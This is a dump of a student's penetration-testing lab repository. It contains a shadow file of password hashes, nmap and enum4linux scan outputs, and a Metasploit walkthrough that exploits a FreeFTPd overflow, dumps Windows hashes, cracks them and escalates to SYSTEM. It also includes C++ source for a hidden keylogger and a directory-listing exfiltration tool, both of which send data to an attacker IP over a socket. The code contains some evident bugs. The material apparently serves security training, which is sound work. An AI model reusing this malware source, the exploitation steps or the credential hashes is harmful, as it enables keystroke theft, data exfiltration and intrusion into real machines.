stefan:$6$5UNbMPFr$S9zKaPdjN3WF5XdvcBZrc1RV.bk/ufmZgiNAr8OsnKtZCPqFRtQ.g2ewAbQ40ARubCMQD0fIdQSL3LB4JBBuK1:16470:0:99999:7:::
sam:$6$4IQ98NuP$Q7Kd1uQhbVl4rv9yPzn51rA8U1stcC9zCUu/o83v959HNcMXdEyZ39Ec8/cTq89v/fes.lwpozekSK16JHLr3/:16470:0:99999:7:::
linux-kernel:$6$iZd1ERbp$wO5U7YmvpfM8vuJX2er3jI7JPUTv7ahoypgc2n1/CWQr9yyf7CyFcxUBj9T2tEx7KR9x3Z6/C5Q3wxumJKMuu/:16470:0:99999:7:::
jonathan:$6$JN51qUeO$YRkPN8gR43gmtTEg0uycZaz3SOOwT37g17tt8bB/Fi/Xr/dKPsUhaWfOjZ1uNrJg7sL4z9srGe.zWP0B1tfQc/:16470:0:99999:7:::
erik:$6$Ib9a2n66$vfEKmQ0LO/sV3M4PsanGWx3ATuHNFZ/FysOYhKAdG4PdXeXiLackGxLuNs7qG4KOAVVhyLAM.99pP4j8sJ3Vr1:16470:0:99999:7:::
orion:$6$EnZP3LwQ$pDR2Jny9KIPDEmoB.jzhp38Ik5FyG4DWzewHoEePxdCBzFfBWnIUQNXDNup8U2IoAiUC/jaO/i9SpStI8ZgIa1:16470:0:99999:7:::
doug:$6$kV2vj2S6$eKQyp76DlZbo/tgLKyjtLQf.G86BY9oVkfscbIrWwCYRqd.zJnLIOJPrGJJSvK59O.OpUc5L8vo.1yet/IndA.:16470:0:99999:7:::
spam:$6$b4.yukui$byGJM8hTw11KmLes6YSfvo7IKfkg5HYtll.JOVFJgM9IObO6NE7dpLhTiHxgLLCPtXa0wbwxPAlYTtPsrCnLP.:16470:0:99999:7:::
nessus:$6$5b.qaMaF$MSnDGsA6Yo7LzABXWXtdHb5HruaehdkrLbdv9Yg.lQoG9nC6patjwPqFuR1G2CSslqIZkBbZst7rhCeJXr3Z.0:16470:0:99999:7:::
bugs:$6$cJfe9yB0$DkgkyIHYGOFQ9hIF6A28Da0niQBq6Yn9PXjNKAJEK7y0sdEc6v9KSpW8DEBXg.lO/MCgpHuuAbbcAQfYs36gG/:16470:0:99999:7:::
rick:$6$SFXj7ADA$qu3mlQDjIwVNzC.3JkUKUS2Hp7aeC1Zg5GP1h7nM5BmCTsJ7d1ckSF3ErjPbpZFIqNCz6NAgy1F76PmjeJz.x0:16470:0:99999:7:::
josh:$6$KU1UUsAZ$ac7T8xBfcLxXmb/qRNuEKrfZy1G/kcqsJzWJ93/qTa08itf31x5/pcdVHj30MKXYh/poaN8fOlKkZR0f2xrr3.:16470:0:99999:7:::
research:$6$m0nQbAaZ$FKL3XBWkT3GEv0UVn6WTHssjyjou2/33f8BKE4voI7HWU9FdF1hABlyQAqAYhJOfRuQpuZzSBcJVvCMtMX6D51:16470:0:99999:7:::
craig:$6$movXAzDc$E4sBocqFLzY9iif37.1VF4uuOr5QsI7ZwrnkTM.ITDebTuEc5od/87suR9fBPGuEm4HU4pUf324z3Pxb86Sk9/:16470:0:99999:7:::
sven:$6$L2Ac90qT$4NWVht13koXx1Zewnoq.aqh7584NpDNToIa41Qqbc94hwitYtA5pXZF0ZwsKRUIQ4bf0Z.5Tm9Ue5BLbw1y/61:16470:0:99999:7:::
gary:$6$mbC5nX5S$baJcUKoownjBSnz6/wuXNK75gvtKZ5dub4BZwpjP1YvgkjooQ8GRbZpR4fAo0zevFiGWONgHjDkLKYxDiYIST/:16470:0:99999:7:::
brett:$6$qd2dCjHj$6qWUTOIG5OmP5OcN3.cMfDr24ScByDakPNIrRZjZqcqaiHlBuFbGvDsGTIAPizkZGrIvuH7gnhAgt/hg3f9Gz/:16470:0:99999:7:::
Security:$6$GPayTWXW$sSarI38ETnIzRUSXgEXambmN8FNcCuUiDqnMYeeKYzavwk0Pefw5VafzCG9jpgTnzaWrY1QlbpkNOy4c22yRu.:16470:0:99999:7:::
torvalds:$6$UdO6LNso$sIErGAh.8NWiPZyarP4EqM15zKLy8ZDT4C1HixADAOHJ8MojNHFAJa33jx9qpixPiUpgibhKJpKb4gY/YgjSx1:16470:0:99999:7:::
nate:$6$cic0vUV.$/zZv9r8/5C8D7HkGlymqTr1t248kTvSScQfyxnYldFQPQplIbfrn2R61ZHu.t0ImjP38YyMzw1Wbftpg8p9Xf0:16470:0:99999:7:::
larry:$6$C1wU6KtA$XgPBkqQLm6j2QdkDfLNyyQC90Fck6.EKAKxwD0DVeHm2m8k3.r4yLB0.lqa741PXTOYpq.gZPt83GsQszfK0G1:16470:0:99999:7:::
adrian:$6$.wQ4ogUx$xRH9xkYVsVAKswluFPaNZj0c/CxVyzpdBkQaZ1rpSU8IEzub91YTwTDrEJUvWnCL9K.Sfm81/lQhLY1VpbX8g1:16470:0:99999:7:::
test:$6$IKTyMZxA$C6g0kSQ7eWmmRQrB7jlFMvS4oPU48tE18sJKuPxX0QSl9QlOXwwY3U.2aTpalC3i6qcPbLSbjav0SjmlxplNp0:16470:0:99999:7:::
tech:$6$OTt3okCG$lrKSF4KyxVZgWlJ3uGgBRmMkChdZ8hxHyPWXS2/a2Vlq129Zq3jCZVINrW9nRG20TNsqI0MN07e88jJTGVGjd1:16470:0:99999:7:::
someone:$6$Zk8ylIKZ$rFllR3qlbmirrkgwRppG0HaV9ppHK0/jHWTVeqsX3oxFKjnzgg.DnS7CMXas151xCk51CmUV4dmeL17cJ3nIZ0:16470:0:99999:7:::
kris:$6$MIsyuc0b$PcN7IMMSL7Fjla0C7IayevAuLD6iQmkvGX2rIxcx0VAGr7LACwtchRrE3AcZO5yTr3MQlZac9q2tvJcQjAUiF0:16470:0:99999:7:::
andreas:$6$rsAbNhaA$CAbbNGghKugILQ6glWV0tEzeVbhoMB3S92Y155EHMaGeZsi6TpCIDVjw8aWlmWGIQAdB28OLQMKgWbYEAEz8x1:16470:0:99999:7:::
akpm:$6$00w49s/D$wpRXPoKKRN4rNp11hIPCJ0v/C6BPpI.GZeihVlSfpvVd0s0zqglwb.blyf.hLsgrIbKwDI1s0Yvk6.FmArahS/:16470:0:99999:7:::
stephen:$6$ssSU27er$LdCIfDEwxxrPHZLILJoBz3Zg.wWEaVgUfxf7pd8TQXtF4d1nOtIkUav2TMY1xrbyhCutzShgIkQTeopPCwlRg/:16470:0:99999:7:::
password:$6$hy0ECcK6$FdtsdPMLymN9GYJFaWsCq16yyMY05Whd41qODKrWpSmwR1QiiOPcUtLutMJtpWkDv/AqUivlU2NChCrUZMini0:16470:0:99999:7:::
oliver:$6$Iv.78Pvl$x4i0h9HyFfRo5mLan7JhSIS.5Yn7W5shQQpqHMC5ToXdUTWrUYDjgIZ1DtwTU4YRUh9O6QeR84k.i.4NSfX.51:16470:0:99999:7:::
blaisorblade:$6$fI69BmWc$wrckcetwa5aKTbP0QZU7mJ3QD2yATRzag31BaCYUE0c/ESYNf1ivKrD/VsDY3D/PuIs1pup.VYm8OkwDnrUd6.:16470:0:99999:7:::
roman:$6$pyat9UWx$t1ZZZGJ56DMNfl9IIWmT4DNeAQ1/RngqhGS232FytUAEtLn.duPbCoykRkfUiP2XrpV3V8Qh7wejTDsqyrXFq.:16470:0:99999:7:::
postfix:$6$rMJQQZvk$EsTIxQbNZAgsETizbhaK/JUX0SAvWdXuVi0lNH1qI3kFy98e08XpH1c2fEOlCIlekhyymCiDVTP03Y/fo46pa.:16470:0:99999:7:::
nathan:$6$t1nr6qNz$GdaeXW3DynadN54N9.XGO3F1VN0kWgxfnE7i/KaPM9Rv2FVEfZaJDNMqqrcrxtHjtxH8dHMIgnIviAlXejZI0.:16470:0:99999:7:::
karl:$6$2SjYTDHQ$or6fqbKAyWYmzj7yqQov/KWIeti459Y83WCgh3hp11cQdRhzLIyOjUo1tFn/vtZpWDb6Sc94T2CL5MgMcgb0Z/:16470:0:99999:7:::
jose:$6$q0dfDsFf$md83VAivCKQ0mKAt3iUhX5XyX2.mif0bdDm3qd/uu6pGPlFFdpHXiFiPrU3A5QfnksdVA.yMF2kqqARuBybmH/:16470:0:99999:7:::
feedback:$6$oxHD8GmD$kGMV8tRl31iptNlU3kLM7Z9vrqSTqosZtjHseV.bFuRhrD9ZYUjxgYabUL2CaQYq6kChznrdyg1hk.L9om0eQ1:16470:0:99999:7:::
dev:$6$MDKxgwuE$vnvMEnKF/CwtqC60XEdqQO07UTrIVV0IxNoaMl3uGQy37Gh9Dl5jbg0bbAOBon2Uslmzy28AcyO7xJafdd5iw0:16470:0:99999:7:::
bryan:$6$ZFlofYYU$aWT3Ig1t7xYYrkIdZb..EUaYUrwGzLSVaKhy5IJtvFTQAKUi4xf8Ek8IU2KQf6Hj9YJBY7fpuSKW052ct/qmI.:16470:0:99999:7:::
bruce:$6$bKYubhwp$8VamLKD7r3OWbnqn79l3HsuBf5X8YAR2cq6s5.Tparz2GK2dGThKQTchJ3ZHTmCV7VsJdZzqXRHiknQU2gaDf0:16470:0:99999:7:::
qmailr:$6$ewnv7baU$vgPT5H27mTC1LPskTQlmkWug1puAoIeEpWhWY65.PDOIXk09unASmKIpgYCTGIGUpXyg6Y04Sswqo2shldi30/:16470:0:99999:7:::
jamie:$6$hKrwJ2XL$K.VjPjTb0deFuo3YIhvypxHN9Wn952X2rIbhJ.t.5Gk9uO1vqt3NH5HEw2uPwPGMYSpuM4GzfXLEO9PKO2ZM//:16470:0:99999:7:::
derek:$6$VRU46VG/$21FGTv71yuYyQ/7AtIzIqjV3GdHivvx7abiNlqe/QMffvF4NNAGRJ0cDL2eyWM2vPfIZZtcpn8P6XrcqqblYP/:16470:0:99999:7:::
brandon:$6$OsORtNZ.$1Jr.wOnm6EonOFjMu7utgFiv5VT.K2Fbt0JehTIevXHom.if0w3QBWeMvXJ0BZHeA8TleiCkcozae1KOBlbHX.:16470:0:99999:7:::
risks:$6$SoZjQEuS$Nxo6bfcqQGXW7Sj40Y/7OuG4KgKMzWROATWrJ6EfO9wk0FTqQXMv2Rx6Eml3p7i7s7YM/9S6wwA8hUtcQ9sRY0:16470:0:99999:7:::
proberts:$6$ft8ebMmB$pZgSxqCWt9CxaAM7KrD9PTVJRVGFeAsm9mkWavvOYlErmnmYuo/qFYSLZ.jfgbfHEwq//nz67TK4MHRm6NemL0:16470:0:99999:7:::
pierre:$6$jhaog97C$XVbyU2iMF0Fj8qMg0.PryFkhVctz50UTCzmtSvgYIJKtEzvfJ5XQ.V5aiGph2IjMOaUhSL1eDO8.sYSQDydGZ/:16470:0:99999:7:::
pgo:$6$msJLJFAW$3yLybUn97UyvcxoV77JCoRS9IVcgPb5lMYNPgc2.bQKBrZvT3Qw48GroMnA.VPPdQlGHRKRL70bYDWa8HWJOX1:16470:0:99999:7:::
maxim:$6$v4qWXFNW$xvrxBZ8gfF7fsbGJ3V94dew9bajgsxI62Ew0jM0GK/EGRVQmT6sNpEbcYzVuSK8U6ziH7R7pqWwC9Uja7eF5X0:16470:0:99999:7:::
guest:$6$6vAGLPss$5Ciwdq3qSTSTfgtrqZ.cY9SI5AtZwHN/MBqIEIhCOJcmXKDik7Je47JvyjeAng01AcfsjEMatE4tzusDIcEwU0:16475:0:99999:7:::
================================================
FILE: ine-labs/dirbuster/alive_hosts.txt
================================================
10.104.11.50
10.104.11.96
10.104.11.198
================================================
FILE: ine-labs/dirbuster/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Thu Feb 18 13:45:12 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt
Nmap scan report for 10.104.11.50
Host is up (0.00026s latency).
All 1000 scanned ports on 10.104.11.50 are closed
Nmap scan report for 10.104.11.96
Host is up (0.058s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.104.11.198
Host is up (0.064s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open mysql MySQL 5.5.38-0+wheezy1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 18 13:45:23 2021 -- 3 IP addresses (3 hosts up) scanned in 11.44 seconds
================================================
FILE: ine-labs/exploit-based-cpp/exploit.cpp
================================================
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string>
#include <dirent.h>
#include <iostream>
#define ATTACKER_IP ""
SOCKET InitServer()
{
ShowWindow(GetConsoleWindow(), SW_HIDE);
WSDATA wsaData;
SOCKET server; // the socket to connect to
SOCKADDR_IN addr; // holds connection details
int result;
// The WSAStartup function initiates use of the WS2_32.dll
result = WSAStartup(MAKEWORD(2, 0), &WSAData);
if (result != 0) {
printf("WSAStartup failed with error code: %d\n", result);
exit(result);
}
server = socket(AF_INET, SOCK_STREAM, 0); // establish TCP socket
// manually add needed socket values; could instead use getaddrinfo()
addr.sin_addr.s_addr = inet_addr(ATTACKER_IP);
addr.sin_family = AF_INET;
addr.sin_port = htons(5555);
result = connect(server, (SOCKADDR *)&addr, sizeof(addr));
if (result = SOCKET_ERROR)
server = INVALID_SOCKET;
return server;
}
char *GetUserDirectory()
{
char *pPath = getenv("USERPROFILE");
if (pPath == NULL) {
perror("getenv");
exit(1);
}
return pPath;
}
void SendData(SOCKET sockfd, char *buf)
{
int result = send(sockfd, buf, (int) strlen(buf), 0);
if (result == SOCKET_ERROR) {
printf("send failed: %d\n", WSAGetLastError());
closesocket(server);
WSACleanup();
exit(1);
}
}
int SendUserDirectory(SOCKET sockfd, const char *dirname)
{
DIR *dirp;
struct dirent *entry;
dirp = opendir(dirname);
errno = 0;
while ((entry = readdir(dirp)) != NULL) {
SendData(sockfd, entry->d_name, (int) strlen(entry->d_name), 0);
}
// When an error is encountered, a null pointer is returned and errno
// is set to indicate the error. When the end of the directory
// is encountered, a null pointer is returned and errno is not changed.
return errno;
}
int main()
{
SOCKET server;
char *pPath = GetUserDirectory();
server = InitServer();
if (server == INVALID_SOCKET) {
printf("Failed to connect!\n");
closesocket(server);
WSACleanup();
return 1;
}
SendData(server, pPath);
SendUserDirectory(server, pPath);
// TODO error check
closesocket(server);
WSACleanup();
return 0;
}
================================================
FILE: ine-labs/exploit-based-cpp/keylogger.cpp
================================================
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define ATTACKER_IP "10.0.2.15"
int main()
{
ShowWindow(GetConsoleWindow(), SW_HIDE);
char KEY;
WSADATA WSAData;
SOCKET server;
SOCKADDR_IN addr;
WSAStartup(MAKEWORD(2, 0), &WSAData);
server = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_addr.s_addr = inet_addr(ATTACKER_IP)
addr.sin_family = AF_INET;
addr.sin_port = htons(5555);
connect(server, (SOCKADDR *)&addr, sizeof(addr));
// collect the pressed keys
while (true) {
Sleep(10); // pause for 10 milliseconds
// check if this is a printable key (keycodes defined by Microsoft)
for (int KEY = 0x8; KEY < 0xFF; KEY++) {
if (GetAsyncKeyState(KEY) == -32767) {// if key was pressed
char buffer[2];
buffer[0] = KEY;
send(server, buffer, sizeof(buffer), 0);
}
}
}
// cleanup
closesocket(server);
WSACleanup();
}
================================================
FILE: ine-labs/metasploit/README.md
================================================
# Metasploit Lab
## Description
In this lab, you will have to use Metasploit and meterpreter against a real
machine; this will help you become familiar with the Metasploit framework and
its features.
## Goals
- Identify the target machine on the network
- Find a vulnerable service
- Exploit the service by using Metasploit to get a meterpreter session
- Gather information from the machine by using meterpreter commands
- Retrieve the password hashes from the exploit machine
- Search for a file named \"Congrats.txt\"
## Recon
After connecting to the Hera Lab VPN, it is time to search for a vulnerable
target. I used nmap for this:
```
$ nmap -sV -oN nmap_scan.txt 192.168.99.100/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-23 12:43 EST
Nmap scan report for 192.168.99.12
Host is up (0.059s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp FreeFTPd 1.0
22/tcp open ssh WeOnlyDo sshd 2.1.8.98 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows,
cpe:/o:microsoft:windows_xp
```
From the scan we see that the IP address 192.168.99.12 has several services
running on it. Time to open up metasploit and determine which service is
vulnerable for exploit.
## Vulnerability Assessment
Searching for the FreeFTPd service in msfconsole yields the following results:
```
msf6 > search FreeFTPd 1.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow
1 exploit/windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow
2 exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
```
I chose the first exploit since it has the most recent disclosure data and higher rank. I left the default
payload as windows/meterpreter/reverse_tcp shell.
The only options we need to change are the remote and local hosts:
```
set RHOSTS 192.168.99.12
set LHOST 192.168.99.100
```
## Exploitation
Run the exploit to spawn a meterpreter session.
### Cracking hashes
Once inside meterpreter, run the hashdump command:
```
meterpreter> hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
eLSAdmin:1003:aad3b435b51404eeaad3b435b51404ee:87289513bddc269f9bcb24d74864beb2:::
ftp:1004:4ff1ab31fc4b0ebdaad3b435b51404ee:9865c4bdcd9578a380297c5095e6c852:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::
```
I copied the output to a file named hashdump.txt and fed it to john:
```
$ john hashdump.txt
```
### Escalate Privileges
We can escalate our privileges with the getsystem command:
```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
### Print Congrats.txt
The Congrats.txt file can easily be found with the search command:
```
meterpreter > search -f Congrats.txt
Found 1 result...
c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt (64 bytes)
meterpreter > cat "c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt"
Congratulations! You have successfully exploited this machine!
```
## Install a Backdoor
================================================
FILE: ine-labs/metasploit/hashdump.txt
================================================
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
eLSAdmin:1003:aad3b435b51404eeaad3b435b51404ee:87289513bddc269f9bcb24d74864beb2:::
ftp:1004:4ff1ab31fc4b0ebdaad3b435b51404ee:9865c4bdcd9578a380297c5095e6c852:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::
================================================
FILE: ine-labs/metasploit/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Tue Feb 23 12:43:57 2021 as: nmap -sV -oN nmap_scan.txt 192.168.99.100/24
Nmap scan report for 192.168.99.12
Host is up (0.059s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp FreeFTPd 1.0
22/tcp open ssh WeOnlyDo sshd 2.1.8.98 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Nmap scan report for 192.168.99.100
Host is up (0.00030s latency).
All 1000 scanned ports on 192.168.99.100 are closed
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 23 12:44:13 2021 -- 256 IP addresses (2 hosts up) scanned in 15.93 seconds
================================================
FILE: ine-labs/nessus/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Thu Feb 18 12:17:44 2021 as: nmap -A -oN nmap_scan.txt 192.168.99.70/24
Nmap scan report for 192.168.99.50
Host is up (0.055s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
MAC Address: 00:50:56:A2:64:C8 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/18%OT=135%CT=1%CU=40956%PV=Y%DS=1%DC=D%G=Y%M=005056%
OS:TM=602EA184%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II=
OS:I%SS=S%TS=0)OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4
OS:=M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)WIN(W1=FFFF%W2=FFFF%
OS:W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC
OS:=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=
OS:S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NN
OS:S%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
OS:T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN
OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 4h08m16s, deviation: 5h39m25s, median: 8m15s
|_nbstat: NetBIOS name: ELS-WINXP, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a2:64:c8 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: els-winxp
| NetBIOS computer name: ELS-WINXP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-02-18T09:26:26-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 54.90 ms 192.168.99.50
Nmap scan report for 192.168.99.70
Host is up (0.000048s latency).
All 1000 scanned ports on 192.168.99.70 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 18 12:19:02 2021 -- 256 IP addresses (2 hosts up) scanned in 78.85 seconds
================================================
FILE: ine-labs/null-session/Congratulations.txt
================================================
Congratulations! You have successfully exploited a null session!
================================================
FILE: ine-labs/null-session/alive_hosts.txt
================================================
192.168.99.100
192.168.99.162
================================================
FILE: ine-labs/null-session/enum4linux_scan.txt
================================================
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 21 17:22:35 2021
==========================
| Target Information |
==========================
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.99.162 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.99.162 |
==============================================
Looking up status of 192.168.99.162
ELS-WINXP <00> - B <ACTIVE> Workstation Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
ELS-WINXP <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MAC Address = 00-50-56-A0-46-C7
=======================================
| Session Check on 192.168.99.162 |
=======================================
[+] Server 192.168.99.162 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.99.162 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on 192.168.99.162 |
========================================
[+] Got OS info for 192.168.99.162 from smbclient:
[+] Got OS info for 192.168.99.162 from srvinfo:
192.168.99.162 Wk Sv NT PtB LMB
platform_id : 500
os version : 5.1
server type : 0x51003
===============================
| Users on 192.168.99.162 |
===============================
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS Name: (null) Desc: (null)
index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank Name: Frank Desc: (null)
index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant Name: Remote Desktop Help Assistant Account Desc: Account for Providing Remote Assistance
index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin Desc: (null)
index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US Desc: This is a vendor's account for the Help and Support Service
user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[HelpAssistant] rid:[0x3e8]
user:[netadmin] rid:[0x3ec]
user:[SUPPORT_388945a0] rid:[0x3ea]
===========================================
| Share Enumeration on 192.168.99.162 |
===========================================
Sharename Type Comment
--------- ---- -------
My Documents Disk
IPC$ IPC Remote IPC
Frank Disk
C Disk
WorkSharing Disk
FrankDocs Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$ Mapping: OK Listing: DENIED
//192.168.99.162/Frank Mapping: OK Listing: DENIED
//192.168.99.162/C [E] Can't understand response:
AUTOEXEC.BAT A 0 Thu Feb 12 19:50:47 2015
boot.ini HS 211 Thu Feb 12 19:46:17 2015
CONFIG.SYS A 0 Thu Feb 12 19:50:47 2015
Documents and Settings D 0 Wed Feb 18 04:25:58 2015
IO.SYS AHSR 0 Thu Feb 12 19:50:47 2015
MSDOS.SYS AHSR 0 Thu Feb 12 19:50:47 2015
NTDETECT.COM AHSR 47564 Tue Aug 3 13:08:34 2004
ntldr AHSR 250032 Tue Aug 3 13:29:34 2004
pagefile.sys AHS 805306368 Sun Feb 21 23:01:08 2021
Program Files DR 0 Mon Oct 3 12:10:27 2016
System Volume Information DHS 0 Thu Feb 12 19:54:12 2015
WINDOWS D 0 Mon Oct 3 12:12:49 2016
785224 blocks of size 4096. 304467 blocks available
//192.168.99.162/WorkSharing Mapping: OK, Listing: OK
//192.168.99.162/FrankDocs Mapping: OK Listing: DENIED
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.99.162/C$ Mapping: DENIED, Listing: N/A
======================================================
| Password Policy Information for 192.168.99.162 |
======================================================
[+] Attaching to 192.168.99.162 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.99.162)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] ELS-WINXP
[+] Builtin
[+] Password Info for Domain: ELS-WINXP
[+] Minimum password length: None
[+] Password history length: None
[+] Maximum password age: 42 days 22 hours 47 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
================================
| Groups on 192.168.99.162 |
================================
